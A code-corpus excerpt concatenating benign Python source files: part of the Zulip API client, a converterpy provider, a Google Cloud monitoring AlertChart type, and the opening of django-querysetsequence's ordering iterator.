>>> client.delete_custom_emoji("green_tick")
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url=f"realm/emoji/{emoji_name}",
method="DELETE",
)
    def get_realm_linkifiers(self) -> Dict[str, Any]:
        """
        List the realm's linkifiers.

        Example usage:

        >>> client.get_realm_linkifiers()
        {
            'result': 'success',
            'msg': '',
            'linkifiers': [
                {
                    'id': 1,
                    'pattern': '#(?P<id>[0-9]+)',
                    'url_format': 'https://github.com/zulip/zulip/issues/%(id)s',
                },
            ]
        }
        """
        return self.call_endpoint(
            url="realm/linkifiers",
            method="GET",
        )
def add_realm_filter(self, pattern: str, url_format_string: str) -> Dict[str, Any]:
"""
Example usage:
>>> client.add_realm_filter('#(?P<id>[0-9]+)', 'https://github.com/zulip/zulip/issues/%(id)s')
{'result': 'success', 'msg': '', 'id': 42}
"""
return self.call_endpoint(
url="realm/filters",
method="POST",
request={
"pattern": pattern,
"url_format_string": url_format_string,
},
)
def remove_realm_filter(self, filter_id: int) -> Dict[str, Any]:
"""
Example usage:
>>> client.remove_realm_filter(42)
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url=f"realm/filters/{filter_id}",
method="DELETE",
)
def get_realm_profile_fields(self) -> Dict[str, Any]:
"""
Example usage:
>>> client.get_realm_profile_fields()
{'result': 'success', 'msg': '', 'custom_fields': [{...}, {...}, {...}, {...}]}
"""
return self.call_endpoint(
url="realm/profile_fields",
method="GET",
)
def create_realm_profile_field(self, **request: Any) -> Dict[str, Any]:
"""
Example usage:
>>> client.create_realm_profile_field(name='Phone', hint='Contact No.', field_type=1)
{'result': 'success', 'msg': '', 'id': 9}
"""
return self.call_endpoint(
url="realm/profile_fields",
method="POST",
request=request,
)
def remove_realm_profile_field(self, field_id: int) -> Dict[str, Any]:
"""
Example usage:
>>> client.remove_realm_profile_field(field_id=9)
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url=f"realm/profile_fields/{field_id}",
method="DELETE",
)
def reorder_realm_profile_fields(self, **request: Any) -> Dict[str, Any]:
"""
Example usage:
>>> client.reorder_realm_profile_fields(order=[8, 7, 6, 5, 4, 3, 2, 1])
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url="realm/profile_fields",
method="PATCH",
request=request,
)
def update_realm_profile_field(self, field_id: int, **request: Any) -> Dict[str, Any]:
"""
Example usage:
>>> client.update_realm_profile_field(field_id=1, name='Email')
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url=f"realm/profile_fields/{field_id}",
method="PATCH",
request=request,
)
def get_server_settings(self) -> Dict[str, Any]:
"""
Example usage:
>>> client.get_server_settings()
{'msg': '', 'result': 'success', 'zulip_version': '1.9.0', 'push_notifications_enabled': False, ...}
"""
return self.call_endpoint(
url="server_settings",
method="GET",
)
def get_events(self, **request: Any) -> Dict[str, Any]:
"""
See the register() method for example usage.
"""
return self.call_endpoint(
url="events",
method="GET",
longpolling=True,
request=request,
)
def register(
self,
event_types: Optional[Iterable[str]] = None,
narrow: Optional[List[List[str]]] = None,
**kwargs: object,
) -> Dict[str, Any]:
"""
Example usage:
>>> client.register(['message'])
{u'msg': u'', u'max_message_id': 112, u'last_event_id': -1, u'result': u'success', u'queue_id': u'1482093786:2'}
>>> client.get_events(queue_id='1482093786:2', last_event_id=0)
{...}
"""
if narrow is None:
narrow = []
request = dict(event_types=event_types, narrow=narrow, **kwargs)
return self.call_endpoint(
url="register",
request=request,
)
def deregister(self, queue_id: str, timeout: Optional[float] = None) -> Dict[str, Any]:
"""
Example usage:
>>> client.register(['message'])
{u'msg': u'', u'max_message_id': 113, u'last_event_id': -1, u'result': u'success', u'queue_id': u'1482093786:3'}
>>> client.deregister('1482093786:3')
{u'msg': u'', u'result': u'success'}
"""
request = dict(queue_id=queue_id)
return self.call_endpoint(
url="events",
method="DELETE",
request=request,
timeout=timeout,
)
def get_profile(self, request: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
"""
Example usage:
>>> client.get_profile()
{u'user_id': 5, u'full_name': u'Iago', u'short_name': u'iago', ...}
"""
return self.call_endpoint(
url="users/me",
method="GET",
request=request,
)
def get_user_presence(self, email: str) -> Dict[str, Any]:
"""
Example usage:
>>> client.get_user_presence('iago@zulip.com')
{'presence': {'website': {'timestamp': 1486799122, 'status': 'active'}}, 'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url=f"users/{email}/presence",
method="GET",
)
def get_realm_presence(self) -> Dict[str, Any]:
"""
Example usage:
>>> client.get_realm_presence()
{'presences': {...}, 'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url="realm/presence",
method="GET",
)
def update_presence(self, request: Dict[str, Any]) -> Dict[str, Any]:
"""
Example usage:
>>> client.update_presence({
status='active',
ping_only=False,
new_user_input=False,
})
{'result': 'success', 'server_timestamp': 1333649180.7073195, 'presences': {'iago@zulip.com': { ... }}, 'msg': ''}
"""
return self.call_endpoint(
url="users/me/presence",
method="POST",
request=request,
)
def get_streams(self, **request: Any) -> Dict[str, Any]:
"""
See examples/get-public-streams for example usage.
"""
return self.call_endpoint(
url="streams",
method="GET",
request=request,
)
def update_stream(self, stream_data: Dict[str, Any]) -> Dict[str, Any]:
"""
See examples/edit-stream for example usage.
"""
return self.call_endpoint(
url="streams/{}".format(stream_data["stream_id"]),
method="PATCH",
request=stream_data,
)
def delete_stream(self, stream_id: int) -> Dict[str, Any]:
"""
See examples/delete-stream for example usage.
"""
return self.call_endpoint(
url=f"streams/{stream_id}",
method="DELETE",
)
def add_default_stream(self, stream_id: int) -> Dict[str, Any]:
"""
Example usage:
>>> client.add_default_stream(5)
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url="default_streams",
method="POST",
request={"stream_id": stream_id},
)
def get_user_by_id(self, user_id: int, **request: Any) -> Dict[str, Any]:
"""
Example usage:
>>> client.get_user_by_id(8, include_custom_profile_fields=True)
{'result': 'success', 'msg': '', 'user': [{...}, {...}]}
"""
return self.call_endpoint(
url=f"users/{user_id}",
method="GET",
request=request,
)
def deactivate_user_by_id(self, user_id: int) -> Dict[str, Any]:
"""
Example usage:
>>> client.deactivate_user_by_id(8)
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url=f"users/{user_id}",
method="DELETE",
)
def reactivate_user_by_id(self, user_id: int) -> Dict[str, Any]:
"""
Example usage:
>>> client.reactivate_user_by_id(8)
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url=f"users/{user_id}/reactivate",
method="POST",
)
def update_user_by_id(self, user_id: int, **request: Any) -> Dict[str, Any]:
"""
Example usage:
>>> client.update_user_by_id(8, full_name="New Name")
{'result': 'success', 'msg': ''}
"""
if "full_name" in request and self.feature_level < 106:
# As noted in https://github.com/zulip/zulip/issues/18409,
# before feature level 106, the server expected a
# buggy double JSON encoding of the `full_name` parameter.
request["full_name"] = json.dumps(request["full_name"])
return self.call_endpoint(url=f"users/{user_id}", method="PATCH", request=request)
def get_users(self, request: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
"""
See examples/list-users for example usage.
"""
return self.call_endpoint(
url="users",
method="GET",
request=request,
)
def get_members(self, request: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
# This exists for backwards-compatibility; we renamed this
# function get_users for consistency with the rest of the API.
# Later, we may want to add a warning for clients using this
# legacy name.
return self.get_users(request=request)
def get_alert_words(self) -> Dict[str, Any]:
"""
See examples/alert-words for example usage.
"""
return self.call_endpoint(url="users/me/alert_words", method="GET")
def add_alert_words(self, alert_words: List[str]) -> Dict[str, Any]:
"""
See examples/alert-words for example usage.
"""
return self.call_endpoint(
url="users/me/alert_words", method="POST", request={"alert_words": alert_words}
)
def remove_alert_words(self, alert_words: List[str]) -> Dict[str, Any]:
"""
See examples/alert-words for example usage.
"""
return self.call_endpoint(
url="users/me/alert_words", method="DELETE", request={"alert_words": alert_words}
)
def get_subscriptions(self, request: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
"""
See examples/get-subscriptions for example usage.
"""
return self.call_endpoint(
url="users/me/subscriptions",
method="GET",
request=request,
)
def list_subscriptions(self, request: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
logger.warning(
"list_subscriptions() is deprecated." " Please use get_subscriptions() instead."
)
return self.get_subscriptions(request)
def add_subscriptions(self, streams: Iterable[Dict[str, Any]], **kwargs: Any) -> Dict[str, Any]:
"""
See examples/subscribe for example usage.
"""
request = dict(subscriptions=streams, **kwargs)
return self.call_endpoint(
url="users/me/subscriptions",
request=request,
)
def remove_subscriptions(
self,
streams: Iterable[str],
principals: Optional[Union[Sequence[str], Sequence[int]]] = None,
) -> Dict[str, Any]:
"""
See examples/unsubscribe for example usage.
"""
request: Dict[str, object] = dict(subscriptions=streams)
if principals is not None:
request["principals"] = principals
return self.call_endpoint(
url="users/me/subscriptions",
method="DELETE",
request=request,
)
def get_subscription_status(self, user_id: int, stream_id: int) -> Dict[str, Any]:
"""
Example usage:
>>> client.get_subscription_status(user_id=7, stream_id=1)
{'result': 'success', 'msg': '', 'is_subscribed': False}
"""
return self.call_endpoint(
url=f"users/{user_id}/subscriptions/{stream_id}",
method="GET",
)
def mute_topic(self, request: Dict[str, Any]) -> Dict[str, Any]:
"""
See examples/mute-topic for example usage.
"""
return self.call_endpoint(
url="users/me/subscriptions/muted_topics", method="PATCH", request=request
)
def update_subscription_settings(
self, subscription_data: List[Dict[str, Any]]
) -> Dict[str, Any]:
"""
Example usage:
>>> client.update_subscription_settings([{
'stream_id': 1,
'property': 'pin_to_top',
'value': True
},
{
'stream_id': 3,
'property': 'color',
'value': 'f00'
}])
{'result': 'success', 'msg': '', 'subscription_data': [{...}, {...}]}
"""
return self.call_endpoint(
url="users/me/subscriptions/properties",
method="POST",
request={"subscription_data": subscription_data},
)
def update_notification_settings(self, notification_settings: Dict[str, Any]) -> Dict[str, Any]:
"""
Example usage:
>>> client.update_notification_settings({
'enable_stream_push_notifications': True,
'enable_offline_push_notifications': False,
})
{'enable_offline_push_notifications': False, 'enable_stream_push_notifications': True, 'msg': '', 'result': 'success'}
"""
return self.call_endpoint(
url="settings/notifications",
method="PATCH",
request=notification_settings,
)
def get_stream_id(self, stream: str) -> Dict[str, Any]:
"""
Example usage: client.get_stream_id('devel')
"""
stream_encoded = urllib.parse.quote(stream, safe="")
url = f"get_stream_id?stream={stream_encoded}"
return self.call_endpoint(
url=url,
method="GET",
request=None,
)
def get_stream_topics(self, stream_id: int) -> Dict[str, Any]:
"""
See examples/get-stream-topics for example usage.
"""
return self.call_endpoint(url=f"users/me/{stream_id}/topics", method="GET")
def get_user_groups(self) -> Dict[str, Any]:
"""
Example usage:
>>> client.get_user_groups()
{'result': 'success', 'msg': '', 'user_groups': [{...}, {...}]}
"""
return self.call_endpoint(
url="user_groups",
method="GET",
)
def create_user_group(self, group_data: Dict[str, Any]) -> Dict[str, Any]:
"""
Example usage:
>>> client.create_user_group({
'name': 'marketing',
'description': "Members of ACME Corp.'s marketing team.",
'members': [4, 8, 15, 16, 23, 42],
})
{'msg': '', 'result': 'success'}
"""
return self.call_endpoint(
url="user_groups/create",
method="POST",
request=group_data,
)
def update_user_group(self, group_data: Dict[str, Any]) -> Dict[str, Any]:
"""
Example usage:
>>> client.update_user_group({
'group_id': 1,
'name': 'marketing',
'description': "Members of ACME Corp.'s marketing team.",
})
{'description': 'Description successfully updated.', 'name': 'Name successfully updated.', 'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url="user_groups/{}".format(group_data["group_id"]),
method="PATCH",
request=group_data,
)
def remove_user_group(self, group_id: int) -> Dict[str, Any]:
"""
Example usage:
>>> client.remove_user_group(42)
{'msg': '', 'result': 'success'}
"""
return self.call_endpoint(
url=f"user_groups/{group_id}",
method="DELETE",
)
def update_user_group_members(
self, user_group_id: int, group_data: Dict[str, Any]
) -> Dict[str, Any]:
"""
Example usage:
>>> client.update_user_group_members(1, {
'delete': [8, 10],
'add': [11],
})
{'msg': '', 'result': 'success'}
"""
return self.call_endpoint(
url=f"user_groups/{user_group_id}/members",
method="POST",
request=group_data,
)
def get_subscribers(self, **request: Any) -> Dict[str, Any]:
"""
Example usage: client.get_subscribers(stream='devel')
"""
response = self.get_stream_id(request["stream"])
if response["result"] == "error":
return response
stream_id = response["stream_id"]
url = "streams/%d/members" % (stream_id,)
return self.call_endpoint(
url=url,
method="GET",
request=request,
)
def render_message(self, request: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
"""
Example usage:
>>> client.render_message(request=dict(content='foo **bar**'))
{u'msg': u'', u'rendered': u'<p>foo <strong>bar</strong></p>', u'result': u'success'}
"""
return self.call_endpoint(
url="messages/render",
method="POST",
request=request,
)
def create_user(self, request: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
"""
See examples/create-user for example usage.
"""
return self.call_endpoint(
method="POST",
url="users",
request=request,
)
def update_storage(self, request: Dict[str, Any]) -> Dict[str, Any]:
"""
Example usage:
>>> client.update_storage({'storage': {"entry 1": "value 1", "entry 2": "value 2", "entry 3": "value 3"}})
>>> client.get_storage({'keys': ["entry 1", "entry 3"]})
{'result': 'success', 'storage': {'entry 1': 'value 1', 'entry 3': 'value 3'}, 'msg': ''}
"""
return self.call_endpoint(
url="bot_storage",
method="PUT",
request=request,
)
def get_storage(self, request: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
"""
Example usage:
>>> client.update_storage({'storage': {"entry 1": "value 1", "entry 2": "value 2", "entry 3": "value 3"}})
>>> client.get_storage()
{'result': 'success', 'storage': {"entry 1": "value 1", "entry 2": "value 2", "entry 3": "value 3"}, 'msg': ''}
>>> client.get_storage({'keys': ["entry 1", "entry 3"]})
{'result': 'success', 'storage': {'entry 1': 'value 1', 'entry 3': 'value 3'}, 'msg': ''}
"""
return self.call_endpoint(
url="bot_storage",
method="GET",
request=request,
)
def set_typing_status(self, request: Dict[str, Any]) -> Dict[str, Any]:
"""
Example usage:
>>> client.set_typing_status({
'op': 'start',
'to': [9, 10],
})
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(url="typing", method="POST", request=request)
    def move_topic(
        self,
        stream: str,
        new_stream: str,
        topic: str,
        new_topic: Optional[str] = None,
        message_id: Optional[int] = None,
        propagate_mode: EditPropagateMode = "change_all",
        notify_old_topic: bool = True,
        notify_new_topic: bool = True,
    ) -> Dict[str, Any]:
        """
        Move a topic from ``stream`` to ``new_stream``

        The topic will be renamed if ``new_topic`` is provided.

        message_id and propagation_mode let you control which messages
        should be moved. The default behavior moves all messages in topic.

        propagation_mode must be one of: `change_one`, `change_later`,
        `change_all`. Defaults to `change_all`.

        Example usage:

        >>> client.move_topic('stream_a', 'stream_b', 'my_topic')
        {'result': 'success', 'msg': ''}
        """
        # get IDs for source and target streams
        result = self.get_stream_id(stream)
        if result["result"] != "success":
            return result
        # NOTE: `stream` and `new_stream` are rebound from names (str)
        # to numeric stream IDs from here on.
        stream = result["stream_id"]
        result = self.get_stream_id(new_stream)
        if result["result"] != "success":
            return result
        new_stream = result["stream_id"]

        if message_id is None:
            # Without an explicit anchor message we can only move the
            # whole topic.
            if propagate_mode != "change_all":
                raise AttributeError(
                    "A message_id must be provided if " 'propagate_mode isn\'t "change_all"'
                )
            # ask the server for the latest message ID in the topic.
            result = self.get_messages(
                {
                    "anchor": "newest",
                    "narrow": [
                        {"operator": "stream", "operand": stream},
                        {"operator": "topic", "operand": topic},
                    ],
                    "num_before": 1,
                    "num_after": 0,
                }
            )
            if result["result"] != "success":
                return result
            if len(result["messages"]) <= 0:
                return {"result": "error", "msg": f'No messages found in topic: "{topic}"'}
            message_id = result["messages"][0]["id"]

        # move topic containing message to new stream
        request = {
            "stream_id": new_stream,
            "propagate_mode": propagate_mode,
            "topic": new_topic,
            "send_notification_to_old_thread": notify_old_topic,
            "send_notification_to_new_thread": notify_new_topic,
        }
        return self.call_endpoint(
            url=f"messages/{message_id}",
            method="PATCH",
            request=request,
        )
class ZulipStream:
    """
    A file-like object that posts everything written to it as Zulip
    messages to a fixed destination.
    """

    def __init__(self, type: str, to: str, subject: str, **kwargs: Any) -> None:
        # Extra keyword arguments configure the underlying Client.
        self.client = Client(**kwargs)
        self.type = type
        self.to = to
        self.subject = subject

    def write(self, content: str) -> None:
        self.client.send_message(
            {
                "type": self.type,
                "to": self.to,
                "subject": self.subject,
                "content": content,
            }
        )

    def flush(self) -> None:
        # Nothing is buffered; present only for file-object compatibility.
        pass
def hash_util_decode(string: str) -> str:
    """Decode a string encoded by hash_util_encode() (which lives in
    zulip/zulip's zerver/lib/url_encoding.py).

    Example usage:

    >>> zulip.hash_util_decode('test.20here')
    'test here'
    """
    # hash_util_encode uses '.' where normal percent-encoding uses '%';
    # translate back before unquoting.  urllib.parse.unquote already
    # performs the '%2E' -> '.' replacement itself.
    return urllib.parse.unquote(string.replace(".", "%"))
########################################################################
# The below hackery is designed to allow running the Zulip's automated
# tests for its API documentation from old server versions against
# python-zulip-api. Generally, we expect those tests to be a way to
# validate that the Python bindings work correctly against old server
# versions.
#
# However, in cases where we've changed the interface of the Python
# bindings since the release of the relevant server version, such
# tests will fail, which is an artifact of the fact that the
# documentation that comes with that old server release is
# inconsistent with this library.
#
# The following logic is designed to work around that problem so that
# we can verify that you can use the latest version of the Python
# bindings with any server version (even if you have to read the
# current API documentation).
LEGACY_CLIENT_INTERFACE_FROM_SERVER_DOCS_VERSION = os.environ.get(
    "LEGACY_CLIENT_INTERFACE_FROM_SERVER_DOCS_VERSION"
)
if LEGACY_CLIENT_INTERFACE_FROM_SERVER_DOCS_VERSION == "3":
    # This block is support for testing Zulip 3.x, which documents old
    # interfaces for the following functions:
    class LegacyInterfaceClient(Client):
        def update_user_group_members(self, group_data: Dict[str, Any]) -> Dict[str, Any]:  # type: ignore # Intentional override; see comments above.
            """Legacy (Zulip 3.x) calling convention: the group id is
            passed inside `group_data` rather than as a separate argument."""
            modern_group_data = group_data.copy()
            group_id = group_data["group_id"]
            del modern_group_data["group_id"]
            return super().update_user_group_members(group_id, modern_group_data)

        def get_realm_filters(self) -> Dict[str, Any]:
            """
            Example usage:

            >>> client.get_realm_filters()
            {'result': 'success', 'msg': '', 'filters': [['#(?P<id>[0-9]+)', 'https://github.com/zulip/zulip/issues/%(id)s', 1]]}
            """
            # This interface was removed in 4d482e0ef30297f716885fd8246f4638a856ba3b
            return self.call_endpoint(
                url="realm/filters",
                method="GET",
            )

    Client = LegacyInterfaceClient  # type: ignore # Intentional override; see comments above.
| 34.454995 | 150 | 0.554072 |
647544dc747191948872df14f7b09d4aedf1615c | 579 | py | Python | converterpy/provider/builtin.py | bilalekremharmansa/converterpy | 92ecf5ca68e672acad27693eeb83a37ae4d19d3c | [
"MIT"
] | null | null | null | converterpy/provider/builtin.py | bilalekremharmansa/converterpy | 92ecf5ca68e672acad27693eeb83a37ae4d19d3c | [
"MIT"
] | null | null | null | converterpy/provider/builtin.py | bilalekremharmansa/converterpy | 92ecf5ca68e672acad27693eeb83a37ae4d19d3c | [
"MIT"
] | null | null | null | from converterpy.provider import ConverterProvider
from converterpy.converter.si.time_converter import SITimeConverter
from converterpy.converter.si.length_converter import SILengthConverter
from converterpy.converter.si.mass_converter import SIMassConverter
from converterpy.converter.timestamp_date_converter import TimestampDateConverter
class BuiltinConverterProvider(ConverterProvider):
    """Supplies the converters that ship with converterpy itself."""

    def provide(self):
        """Return a fresh instance of every built-in converter."""
        return [
            SITimeConverter(),
            SILengthConverter(),
            SIMassConverter(),
            TimestampDateConverter(),
        ]
| 32.166667 | 81 | 0.766839 |
69dfc9f608a1c5c09b9d705e5db937d9a4825568 | 1,146 | py | Python | google/cloud/monitoring_dashboard_v1/types/alertchart.py | renovate-bot/python-monitoring-dashboards | c1d74f0fbb38f805d7f72f8150cbbb6e5be8c694 | [
"Apache-2.0"
] | 13 | 2020-03-24T22:54:01.000Z | 2022-03-28T22:06:31.000Z | google/cloud/monitoring_dashboard_v1/types/alertchart.py | renovate-bot/python-monitoring-dashboards | c1d74f0fbb38f805d7f72f8150cbbb6e5be8c694 | [
"Apache-2.0"
] | 51 | 2020-01-15T17:48:18.000Z | 2022-03-07T16:01:50.000Z | google/cloud/monitoring_dashboard_v1/types/alertchart.py | renovate-bot/python-monitoring-dashboards | c1d74f0fbb38f805d7f72f8150cbbb6e5be8c694 | [
"Apache-2.0"
] | 8 | 2020-01-15T00:35:12.000Z | 2022-01-29T08:11:27.000Z | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
# Module-level registry used by proto-plus: declares the proto package this
# module belongs to and the message classes it defines (the manifest).
__protobuf__ = proto.module(
    package="google.monitoring.dashboard.v1", manifest={"AlertChart",},
)
class AlertChart(proto.Message):
    r"""A chart that displays alert policy data.

    Attributes:
        name (str):
            Required. The resource name of the alert policy. The format
            is:

            ::

                projects/[PROJECT_ID_OR_NUMBER]/alertPolicies/[ALERT_POLICY_ID]
    """

    # Proto field number 1: the fully-qualified alert policy resource name.
    name = proto.Field(proto.STRING, number=1,)
__all__ = tuple(sorted(__protobuf__.manifest))
| 27.95122 | 79 | 0.696335 |
22bc219a2beddb699c3ce20e4d686a19e7904cb7 | 37,273 | py | Python | queryset_sequence/__init__.py | clokep/django-querysetsequence | 104006cb0245e8c314ce8c51b85a146aa1154762 | [
"0BSD"
] | 17 | 2020-10-07T14:10:39.000Z | 2022-02-10T12:03:24.000Z | queryset_sequence/__init__.py | clokep/django-querysetsequence | 104006cb0245e8c314ce8c51b85a146aa1154762 | [
"0BSD"
] | 7 | 2020-09-30T18:41:57.000Z | 2022-03-04T15:54:40.000Z | queryset_sequence/__init__.py | clokep/django-querysetsequence | 104006cb0245e8c314ce8c51b85a146aa1154762 | [
"0BSD"
] | 2 | 2022-01-11T15:04:50.000Z | 2022-02-02T18:39:07.000Z | from collections import defaultdict
import functools
from itertools import dropwhile
from operator import __not__, attrgetter, eq, ge, gt, itemgetter, le, lt, mul
import django
from django.core.exceptions import (FieldError, MultipleObjectsReturned,
ObjectDoesNotExist)
from django.db import transaction
from django.db.models.base import Model
from django.db.models.constants import LOOKUP_SEP
from django.db.models.query import EmptyQuerySet, QuerySet
# Only export the public API for QuerySetSequence. (Note that QuerySequence and
# QuerySetSequenceModel are considered semi-public: the APIs probably won't
# change, but implementation is not guaranteed. Other functions/classes are
# considered implementation details.)
__all__ = ['QuerySetSequence']
def cmp(a, b):
    """Python 3 replacement for the removed ``cmp`` built-in.

    Returns a negative, zero, or positive integer when ``a`` compares less
    than, equal to, or greater than ``b`` respectively.
    """
    greater = int(a > b)
    lesser = int(a < b)
    return greater - lesser
def multiply_iterables(it1, it2):
    """
    Element-wise iterables multiplications.

    Returns a list where each element is the product of the elements of
    ``it1`` and ``it2`` at the same position.

    Raises:
        AssertionError: if the two iterables differ in length. The check is
            an explicit ``raise`` rather than a bare ``assert`` because
            ``assert`` statements are stripped under ``python -O``, which
            would otherwise let ``map`` silently truncate to the shorter
            input and return a wrong-length result.
    """
    if len(it1) != len(it2):
        raise AssertionError(
            "Can not element-wise multiply iterables of different length.")
    return list(map(mul, it1, it2))
def cumsum(seq):
    """Lazily yield the running (cumulative) sum of ``seq``.

    ``cumsum([1, 2, 3])`` yields 1, 3, 6.
    """
    running_total = 0
    for element in seq:
        running_total = running_total + element
        yield running_total
class BaseIterable:
    """
    Base class for the iterables that materialize a QuerySetSequence.

    Subclasses customize two hooks:

    * ``_get_fields``: how ordering fields are read from a yielded item
      (attributes for model instances, keys for dicts, indexes for tuples).
    * ``_add_queryset_index``: how the originating QuerySet's position (the
      special '#' pseudo-field) is attached to a yielded item.

    ``__iter__`` decides between interleaved ordered iteration and simple
    sequential iteration, applying any slice bounds (``_low_mark`` /
    ``_high_mark``) as lazily as possible.
    """

    def __init__(self, querysetsequence):
        # Create a clone so that subsequent calls to iterate are kept separate.
        self._querysets = querysetsequence._querysets
        self._queryset_idxs = querysetsequence._queryset_idxs
        self._order_by = querysetsequence._order_by
        self._standard_ordering = querysetsequence._standard_ordering
        self._low_mark = querysetsequence._low_mark
        self._high_mark = querysetsequence._high_mark

    @staticmethod
    def _get_fields(obj, *field_names):
        """Retrieve the values of fields from the object."""
        raise NotImplementedError()

    def _add_queryset_index(self, obj, value):
        """Add the QuerySet index to the object and return the object."""
        raise NotImplementedError()

    @classmethod
    def _get_field_names(cls, model):
        """Return a list of field names that are part of a model."""
        return [f.name for f in model._meta.get_fields()]

    @classmethod
    def _cmp(cls, value1, value2):
        """
        Comparison method that takes into account Django's special rules when
        ordering by a field that is a model:

            1. Try following the default ordering on the related model.
            2. Order by the model's primary key, if there is no Meta.ordering.
        """
        if isinstance(value1, Model) and isinstance(value2, Model):
            field_names = value1._meta.ordering

            # Assert that the ordering is the same between different models.
            if field_names != value2._meta.ordering:
                valid_field_names = (set(cls._get_field_names(value1)) &
                                     set(cls._get_field_names(value2)))
                raise FieldError(
                    "Ordering differs between models. Choices are: %s" %
                    ', '.join(valid_field_names))

            # By default, order by the pk.
            if not field_names:
                field_names = ['pk']

            # TODO Figure out if we don't need to generate this comparator every
            # time.
            return cls._generate_comparator(field_names)(value1, value2)

        return cmp(value1, value2)

    @classmethod
    def _generate_comparator(cls, field_names):
        """
        Construct a comparator function based on the field names. The comparator
        returns the first non-zero comparison value.

        Inputs:
            field_names (iterable of strings): The field names to sort on.

        Returns:
            A comparator function.
        """
        # Ensure that field names is a list and not a tuple.
        field_names = list(field_names)

        # For fields that start with a '-', reverse the ordering of the
        # comparison.
        reverses = [1] * len(field_names)
        for i, field_name in enumerate(field_names):
            if field_name[0] == '-':
                reverses[i] = -1
                field_names[i] = field_name[1:]

        # '__' lookups become '.' so attrgetter can traverse relations.
        field_names = [f.replace(LOOKUP_SEP, '.') for f in field_names]

        def comparator(i1, i2):
            # Get a tuple of values for comparison.
            v1 = cls._get_fields(i1, *field_names)
            v2 = cls._get_fields(i2, *field_names)

            # If there's only one arg supplied, a single item is returned,
            # directly return the result in this case.
            if len(field_names) == 1:
                return cls._cmp(v1, v2) * reverses[0]

            # Compare each field for the two items, reversing if necessary.
            order = multiply_iterables(list(map(cls._cmp, v1, v2)), reverses)

            try:
                # The first non-zero element.
                return next(dropwhile(__not__, order))
            except StopIteration:
                # Everything was equivalent.
                return 0

        return comparator

    def _ordered_iterator(self):
        """
        Interleave the values of each QuerySet in order to handle the requested
        ordering. Also adds the '#' property to each returned item.
        """
        # A list of tuples, each with:
        #   * The iterable
        #   * The QuerySet number
        #   * The next value
        #
        # (Remember that each QuerySet is already sorted.)
        iterables = []
        for i, qs in zip(self._queryset_idxs, self._querysets):
            it = iter(qs)
            try:
                value = next(it)
            except StopIteration:
                # If this is already empty, just skip it.
                continue
            # Set the QuerySet number so that the comparison works properly.
            value = self._add_queryset_index(value, i)
            iterables.append((it, i, value))

        # The offset of items returned.
        index = 0

        # Create a comparison function based on the requested ordering.
        _comparator = self._generate_comparator(self._order_by)

        def comparator(tuple_1, tuple_2):
            # The last element in each tuple is the actual item to compare.
            return _comparator(tuple_1[2], tuple_2[2])

        comparator = functools.cmp_to_key(comparator)

        # If in reverse mode, get the last value instead of the first value from
        # ordered_values below.
        if self._standard_ordering:
            next_value_ind = 0
        else:
            next_value_ind = -1

        # NOTE(review): the candidate list is re-sorted every iteration
        # (O(q log q) per yielded row for q QuerySets); a heap would be
        # cheaper -- left as-is here.
        # Continue until all iterables are empty.
        while iterables:
            # If there's only one iterator left, don't bother sorting.
            if len(iterables) > 1:
                # Sort the current values for each iterable.
                iterables = sorted(iterables, key=comparator)

                # The next ordering item is in the first position, unless we're
                # in reverse mode.
                it, i, value = iterables[next_value_ind]
            else:
                it, i, value = iterables[0]

            # Return the next value if we're within the slice of interest.
            if self._low_mark <= index:
                yield value
            index += 1
            # We've left the slice of interest, we're done.
            if index == self._high_mark:
                return

            # Iterate the iterable that just lost a value.
            try:
                value = next(it)
                # Set the QuerySet number so that the comparison works properly.
                value = self._add_queryset_index(value, i)
                iterables[next_value_ind] = it, i, value
            except StopIteration:
                # This iterator is done, remove it.
                del iterables[next_value_ind]

    def _unordered_iterator(self):
        """
        Return the value of each QuerySet, but also add the '#' property to each
        return item.
        """
        for i, qs in zip(self._queryset_idxs, self._querysets):
            for item in qs:
                yield self._add_queryset_index(item, i)

    def __iter__(self):
        # If there's no QuerySets, just return an empty iterator.
        if not len(self._querysets):
            return iter([])

        # If order is necessary, evaluate and start feeding data back.
        if self._order_by:
            # If the first element of order_by is '#', this means first order by
            # QuerySet. If it isn't this, then returned the interleaved
            # iterator.
            if self._order_by[0].lstrip('-') != '#':
                return self._ordered_iterator()

            # Otherwise, order by QuerySet first. Handle reversing the
            # QuerySets, if necessary.
            elif self._order_by[0].startswith('-'):
                self._querysets = self._querysets[::-1]

        # If there is no ordering, or the ordering is specific to each QuerySet,
        # evaluation can be pushed off further.

        # If there is no slicing, iterate through each QuerySet. This avoids
        # calling count() on each QuerySet.
        if self._low_mark == 0 and self._high_mark is None:
            return self._unordered_iterator()

        # First trim any QuerySets based on the currently set limits!
        # counts[k] is the number of rows in QuerySets 0..k-1 combined.
        counts = [0]
        counts.extend(cumsum([it.count() for it in self._querysets]))

        # Trim the beginning of the QuerySets, if necessary.
        start_index = 0
        low_mark, high_mark = self._low_mark, self._high_mark
        if low_mark != 0:
            # Convert a negative index into a positive.
            if low_mark < 0:
                low_mark += counts[-1]

